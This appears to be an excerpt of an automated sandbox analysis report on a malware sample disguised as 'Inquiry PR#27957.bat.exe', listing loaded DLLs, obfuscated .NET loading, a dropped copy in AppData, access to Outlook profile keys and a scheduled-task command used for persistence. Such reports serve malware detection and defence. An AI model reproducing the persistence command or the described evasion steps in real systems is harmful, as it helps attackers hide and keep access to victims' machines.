            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: umpdc.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: mlang.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: umpdc.dll
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeSection loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Inquiry PR#27957.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Inquiry PR#27957.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TsdBVAGjsKVoi.exe, 00000010.00000002.3785830920.00000000005CE000.00000002.00000001.01000000.0000000E.sdmp, TsdBVAGjsKVoi.exe, 00000012.00000000.1710209897.00000000005CE000.00000002.00000001.01000000.0000000E.sdmp, TsdBVAGjsKVoi.exe, 00000015.00000002.3785833047.00000000005CE000.00000002.00000001.01000000.0000000E.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000011.00000002.3788787440.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000011.00000003.1646138502.0000000002E57000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000011.00000003.1654535564.000000000300D000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000011.00000002.3788787440.000000000335E000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000013.00000002.1956648404.00000000035B0000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000013.00000003.1856891406.000000000325A000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000013.00000003.1864671639.0000000003400000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000013.00000002.1956648404.000000000374E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000011.00000002.3788787440.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000011.00000003.1646138502.0000000002E57000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000011.00000003.1654535564.000000000300D000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000011.00000002.3788787440.000000000335E000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000013.00000002.1956648404.00000000035B0000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000013.00000003.1856891406.000000000325A000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000013.00000003.1864671639.0000000003400000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000013.00000002.1956648404.000000000374E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: sfc.pdb source: RegSvcs.exe, 00000009.00000002.1645624396.0000000001198000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.1856939303.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000010.00000003.1875454524.000000000164B000.00000004.00000020.00020000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000012.00000002.3787189728.00000000008B7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: sfc.pdbGCTL source: RegSvcs.exe, 00000009.00000002.1645624396.0000000001198000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.1856939303.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000010.00000003.1875454524.000000000164B000.00000004.00000020.00020000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000012.00000002.3787189728.00000000008B7000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: Inquiry PR#27957.bat.exe, --.cs.Net Code: _0006 System.AppDomain.Load(byte[])
            Source: fuqwoDzun.exe.0.dr, --.cs.Net Code: _0006 System.AppDomain.Load(byte[])
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, r3Q1SYRNwEfwp9YRQp.cs.Net Code: NcyApTJRbl System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, r3Q1SYRNwEfwp9YRQp.cs.Net Code: NcyApTJRbl System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Inquiry PR#27957.bat.exe.7210000.4.raw.unpack, PingPong.cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Inquiry PR#27957.bat.exe.2f4b620.1.raw.unpack, PingPong.cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, r3Q1SYRNwEfwp9YRQp.cs.Net Code: NcyApTJRbl System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 0_2_0543FD12 pushfd ; iretd 0_2_0543FD19
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 0_2_07342C92 push E8FFFFFFh; iretd 0_2_07342C9D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004181F4 push ecx; ret 9_2_004181F6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040D27F push ds; ret 9_2_0040D28D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004033F0 push eax; ret 9_2_004033F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041A478 push 00000025h; iretd 9_2_0041A534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0042DC13 push edi; ret 9_2_0042DC1F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00413CE1 push 57C83816h; retf 9_2_00413D79
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0042349F pushfd ; ret 9_2_004234A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00413D6A push 57C83816h; retf 9_2_00413D79
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041A515 push 00000025h; iretd 9_2_0041A534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041A624 push ecx; retf 9_2_0041A625
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040C68F push esi; ret 9_2_0040C691
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041377B push es; retf 9_2_00413782
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040872A push ecx; ret 9_2_0040872B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015F225F pushad ; ret 9_2_015F27F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015F27FA pushad ; ret 9_2_015F27F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016209AD push ecx; mov dword ptr [esp], ecx9_2_016209B6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015F283D push eax; iretd 9_2_015F2858
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015F1365 push eax; iretd 9_2_015F1369
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 10_2_06912C92 push E8FFFFFFh; iretd 10_2_06912C9D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0114C54D pushfd ; ret 14_2_0114C54E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0114C54F push 8B010D67h; ret 14_2_0114C554
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_011009AD push ecx; mov dword ptr [esp], ecx14_2_011009B6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0114C9D7 push edi; ret 14_2_0114C9D9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_010D1368 push eax; iretd 14_2_010D1369
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_010D1FEC push eax; iretd 14_2_010D1FED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01157E99 push ecx; ret 14_2_01157EAC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeCode function: 16_2_03E543C2 pushfd ; ret 16_2_03E543C3
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeCode function: 16_2_03E55399 push ecx; iretd 16_2_03E5539F
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeCode function: 16_2_03E4B39B push 00000025h; iretd 16_2_03E4B457
            Source: Inquiry PR#27957.bat.exeStatic PE information: section name: .text entropy: 7.729262994799031
            Source: fuqwoDzun.exe.0.drStatic PE information: section name: .text entropy: 7.729262994799031
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, MWAaqsCjcPmuK8pvZQ.csHigh entropy of concatenated method names: 'VYyIFKKLoc', 'E2gI1MUWIK', 'iI0IlNMXWI', 'zymIL3sLVS', 'MefIq0BkDQ', 'ScIIOs0jXj', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, b9060lgXpIuMEFTtMf.csHigh entropy of concatenated method names: 'LZrcqFejME', 'VR8cMHQbf5', 'MCccoXwTGu', 'gxsckCdFcn', 'M3JcmA3qAb', 'IQlcxoFJwI', 'qN4cvyVOR3', 'VCUcw9tynr', 'f4Uch0vHqS', 'X1ZcDVFB3e'
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, gPoWFxhx262UMoc7vh.csHigh entropy of concatenated method names: 'QwibC6E5MF', 'znSbuCQ9u8', 'Lk3bp8yq23', 's4YbQWIdnU', 'UBPb2rQIXZ', 'muKb9wRFlj', 'r3XbTt2E2m', 'GaUb7dyBe1', 'obw49p5ncWwy07BfqTO', 'd0ql2U50OwIV3ITGnt8'
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, qxWLsh0o1oZb7o8vhC.csHigh entropy of concatenated method names: 'JprI6prXOl', 'lMXIcY8irO', 'H4jIZC4HRQ', 'LHMIPFU9AJ', 'idjIbX2i3v', 'fqHIVQWTd3', 'BUEIXTb88a', 'wpBIykQ4yh', 'nRfI8ooUQ8', 'SVKIN7lUUu'
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, uUHGUwQ8UxCOAsbsCR.csHigh entropy of concatenated method names: 'zhU4KDdxOY', 'QAF4TPN6EO', 'kFx4FVnnfp', 'VpX41PR3iT', 'Nsf4LTOhIU', 'NTu4OgncMM', 'TEe4Yg4Tvo', 'yoM4UMeYw3', 'SB74Jkn6jq', 'Tt44avrLMT'
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, VFJ7f6mhMZvHGAEqjh.csHigh entropy of concatenated method names: 'wPO38coWce', 'BQa3NkCeiC', 'ToString', 'bOV36lxBtb', 'hUm3ciI99g', 'OOW3ZeO0HR', 'mZJ3P73tg4', 'YOs3bxphbk', 'p063V5abgs', 'ffq3XdNGZj'
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, mDomuj3kbVoYZcXPk7.csHigh entropy of concatenated method names: 'tTa0it1pnn', 'mJZ0WsOdX2', 'PAH0ABdFLw', 'M3W06IWo4p', 'dhI0c0I9UF', 'FrR0Pp7t0w', 'd4s0bavID1', 'DwiIvw9un3', 'Di0IwXDIUO', 'B8RIh5jBc6'
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, xbiPAnwtp187E2yj75.csHigh entropy of concatenated method names: 'ToString', 'mVs5aBPEo2', 'rEM51GTygT', 'qev5lyNvWb', 'MXP5LtcKLU', 'SBd5Os0Dml', 'Dwt5gSugOv', 'bee5YSFoUx', 'xy35UGHha2', 'q9i5E5Em1C'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, Qv6nKVkMrw0PH54Rlk.csHigh entropy of concatenated method names: 'KpcVugxKbx', 'oXCVjLveUw', 'Gu6Vp9sILu', 'e0pVQfBbeH', 'voEVHVVVrl', 'gk4V2TmTID', 'ARQV9as2NU', 'ivPVKpPDkM', 'X4PVTdfoww', 'XWkV7pN3uY'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, E7cOsiJ5FJYfBJrtfh.csHigh entropy of concatenated method names: 'WD6V61IceB', 'VYgVZoUvqt', 'QIvVbGgFtQ', 'jrhbDt8fLr', 'X1bbzVP55T', 'VACVdifEMp', 'BlqVixqAUA', 'CRaVt0ivpF', 'aIpVWCgdX4', 'ayEVAjc6At'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, YrveFaqHXLxJ3nLH7a.csHigh entropy of concatenated method names: 'PFBp5hZKp', 'D8JQsEOr5', 'yBS2671an', 'FSg9XgxBN', 't6YTb9b5o', 'pq27AivsB', 'tIm94P3jgl7Uw048NG', 'fITJxi9VmKWUxQKOFY', 'Cm4Ifs5Pw', 'xQdRE6vlu'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, QwyVXl69uQASqvDSPL1.csHigh entropy of concatenated method names: 'oWf0ux3hTy', 'GQb0j8mpRg', 'twi0pC49J6', 'fG50QQHaGS', 'YK90HhDut8', 'KAY024VQ7B', 'b8n09BTvht', 'gch0KUGdkH', 'WfQ0TrnaWl', 'vho073BNHn'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, cxQV3w6S9O5x2FnXUAn.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dcnRqSsxna', 'kgyRMaqZ7k', 'sA6RomV12O', 'seIRkkaWG9', 'a3TRm8Mkyn', 'gx8RxiD35n', 'VSjRv2e1xD'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, SYmI45AmVSdHQuptDI.csHigh entropy of concatenated method names: 'fdPGJVBVbZ', 'jiUGfL8BSY', 'LpYGqCTQlL', 'LBxGM4wh8B', 'EJGG1fIRTO', 'fOcGl78I6r', 'xY3GLVZfaq', 'ClIGOhy55M', 'nUAGg33Zkc', 'TkyGYub174'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, FdDnt7PB3Tv3M2q4yi.csHigh entropy of concatenated method names: 'WfkiVP4Jge', 'oZHiX7EaBT', 'KwAi8SDkJv', 'P9tiNSGK1x', 'XjqiGkh7uL', 'N6Gi50d2Fy', 'w0F8YczxjcXtQNWkUg', 'uBkv9lqloGwsjo1MP8j', 'SZJiiX9CsX', 'OIviWUwKdG'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, R7l61W7Y4qgSklHn9m.csHigh entropy of concatenated method names: 'J9LZQKeMx0', 'ykFZ2LH8PV', 'WOvZKrL5O6', 'xRMZTCV0xn', 'gLaZGgK5Ua', 'Oj1Z5RkMRD', 'IDCZ3xHn0O', 'dA0ZIIEAIY', 'cHIZ0oWkWB', 'th3ZRWfyH8'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, r3Q1SYRNwEfwp9YRQp.csHigh entropy of concatenated method names: 'cOhWBZU1nM', 'thJW6M7Zry', 'TCKWcG2tlC', 'xGuWZ0XSvu', 'iPxWPnL32u', 'G0bWbseYVy', 't4MWVprckM', 'D28WXvWCpZ', 'GEsWyF2W8a', 'nQFW89mojk'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, A48FpKzWG2N1S4F0iV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QEk04fOwQm', 'tUJ0GCO9ul', 'GQL057o6tX', 'gbZ03pQyZY', 'BSr0ICbsFQ', 'ia100SuCeX', 'uSC0RIe59V'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, oywN7H2nk0EgtXT8BS.csHigh entropy of concatenated method names: 'crR3wexPE8', 'kAI3D4vprv', 'XyqIdtIrMH', 'fhIIive65h', 'zsY3a3DIpK', 'zyi3fN3E3P', 'LpC3e2WUkK', 'OvD3q9jpp3', 'WJ83MTQTfE', 'jnP3oFEl7I'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, QyCCYl8mpv3brNI45u.csHigh entropy of concatenated method names: 'Dispose', 'vu4ihK5lqN', 'Lolt15Q8ZU', 'GfkSSLiWuK', 'vjmiD02Xm0', 'GGmizTcHdA', 'ProcessDialogKey', 'TajtdEIXPV', 'KI5tiMkdWr', 'K08ttnc1dS'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, VPrUvSfspKnJabrj3o.csHigh entropy of concatenated method names: 'YHlbBctKa3', 'nZcbcjkdif', 'JNEbP2WiON', 'nuZbVbj6om', 'z79bXYfCAK', 'j0sPmZ8c1r', 'CEIPxaCmqJ', 'vjvPv9SDh3', 'b8uPwlkVls', 'HKxPhj4OgU'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, F5jrSH1cjhF6BXAvsS.csHigh entropy of concatenated method names: 'uwLPHA8OQM', 'SntP9ggPVF', 'DjfZlvQ00T', 'ITvZLddUqj', 'fe2ZOCfcXH', 'Jb4Zg4dqe3', 'gTHZYnSYY6', 'H8CZUFFl7i', 'K3kZE8oAhM', 'fELZJh1sNO'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, MWAaqsCjcPmuK8pvZQ.csHigh entropy of concatenated method names: 'VYyIFKKLoc', 'E2gI1MUWIK', 'iI0IlNMXWI', 'zymIL3sLVS', 'MefIq0BkDQ', 'ScIIOs0jXj', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, b9060lgXpIuMEFTtMf.csHigh entropy of concatenated method names: 'LZrcqFejME', 'VR8cMHQbf5', 'MCccoXwTGu', 'gxsckCdFcn', 'M3JcmA3qAb', 'IQlcxoFJwI', 'qN4cvyVOR3', 'VCUcw9tynr', 'f4Uch0vHqS', 'X1ZcDVFB3e'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, gPoWFxhx262UMoc7vh.csHigh entropy of concatenated method names: 'QwibC6E5MF', 'znSbuCQ9u8', 'Lk3bp8yq23', 's4YbQWIdnU', 'UBPb2rQIXZ', 'muKb9wRFlj', 'r3XbTt2E2m', 'GaUb7dyBe1', 'obw49p5ncWwy07BfqTO', 'd0ql2U50OwIV3ITGnt8'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, qxWLsh0o1oZb7o8vhC.csHigh entropy of concatenated method names: 'JprI6prXOl', 'lMXIcY8irO', 'H4jIZC4HRQ', 'LHMIPFU9AJ', 'idjIbX2i3v', 'fqHIVQWTd3', 'BUEIXTb88a', 'wpBIykQ4yh', 'nRfI8ooUQ8', 'SVKIN7lUUu'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, uUHGUwQ8UxCOAsbsCR.csHigh entropy of concatenated method names: 'zhU4KDdxOY', 'QAF4TPN6EO', 'kFx4FVnnfp', 'VpX41PR3iT', 'Nsf4LTOhIU', 'NTu4OgncMM', 'TEe4Yg4Tvo', 'yoM4UMeYw3', 'SB74Jkn6jq', 'Tt44avrLMT'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, VFJ7f6mhMZvHGAEqjh.csHigh entropy of concatenated method names: 'wPO38coWce', 'BQa3NkCeiC', 'ToString', 'bOV36lxBtb', 'hUm3ciI99g', 'OOW3ZeO0HR', 'mZJ3P73tg4', 'YOs3bxphbk', 'p063V5abgs', 'ffq3XdNGZj'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, mDomuj3kbVoYZcXPk7.csHigh entropy of concatenated method names: 'tTa0it1pnn', 'mJZ0WsOdX2', 'PAH0ABdFLw', 'M3W06IWo4p', 'dhI0c0I9UF', 'FrR0Pp7t0w', 'd4s0bavID1', 'DwiIvw9un3', 'Di0IwXDIUO', 'B8RIh5jBc6'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, xbiPAnwtp187E2yj75.csHigh entropy of concatenated method names: 'ToString', 'mVs5aBPEo2', 'rEM51GTygT', 'qev5lyNvWb', 'MXP5LtcKLU', 'SBd5Os0Dml', 'Dwt5gSugOv', 'bee5YSFoUx', 'xy35UGHha2', 'q9i5E5Em1C'
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, File created: C:\Users\user\AppData\Roaming\fuqwoDzun.exe

            Boot Survival

            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp2C94.tmp"

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process information set: NOOPENFILEERRORBOX
